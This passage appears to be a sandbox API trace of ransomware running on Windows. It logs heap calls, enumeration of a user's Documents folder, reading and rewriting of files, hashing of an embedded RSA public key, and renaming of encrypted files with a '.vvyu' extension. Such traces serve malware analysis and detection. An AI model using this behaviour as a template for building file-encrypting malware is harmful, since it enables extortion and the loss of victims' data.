lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0197.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0197.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0197.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea5c0 | out: hHeap=0x2c0000) returned 1 [0197.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.044] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9286, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9286, lpOverlapped=0x0) returned 1 [0197.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.045] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x928b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.045] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.046] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.047] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.047] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.047] CloseHandle (hObject=0x584) returned 1 [0197.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.049] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\22cygPIJe.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\22cygpije.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\22cygPIJe.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\22cygpije.ods.vvyu")) returned 1 [0197.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.053] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.056] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f77a900, ftCreationTime.dwHighDateTime=0x1d8995d, ftLastAccessTime.dwLowDateTime=0xbdb833e0, ftLastAccessTime.dwHighDateTime=0x1d89e8e, ftLastWriteTime.dwLowDateTime=0xbdb833e0, ftLastWriteTime.dwHighDateTime=0x1d89e8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4E_Qp5b8", cAlternateFileName="")) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x371e70 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x311e20 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bb08 [0197.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0197.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bb90 | out: hHeap=0x2c0000) returned 1 [0197.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0197.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bc18 | out: hHeap=0x2c0000) returned 1 [0197.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0197.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x371e70 | out: hHeap=0x2c0000) returned 1 [0197.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.059] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c045a0, ftCreationTime.dwHighDateTime=0x1d8a117, ftLastAccessTime.dwLowDateTime=0xd2fbe3f0, ftLastAccessTime.dwHighDateTime=0x1d8a27b, ftLastWriteTime.dwLowDateTime=0xd2fbe3f0, ftLastWriteTime.dwHighDateTime=0x1d8a27b, nFileSizeHigh=0x0, nFileSizeLow=0xa674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w9_K2R1YG22qFB5WTF98.ots", cAlternateFileName="W9_K2R~1.OTS")) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.059] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\w9_K2R1YG22qFB5WTF98.ots") returned=".ots" [0197.059] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\w9_K2R1YG22qFB5WTF98.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\w9_k2r1yg22qfb5wtf98.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.060] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=42612) returned 1 [0197.060] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.064] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa64e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.064] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.066] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.067] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa674, lpOverlapped=0x0) returned 1 [0197.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.068] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.069] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.069] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.069] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.069] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.069] GetLastError () returned 0x0 [0197.069] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.069] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.069] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.069] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.070] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa670) returned 0x2af5168 [0197.070] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea5c0 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea608 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.071] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6710 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.074] GetCurrentThreadId () returned 0x5d8 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2540 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.074] GetCurrentThreadId () returned 0x5d8 [0197.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: 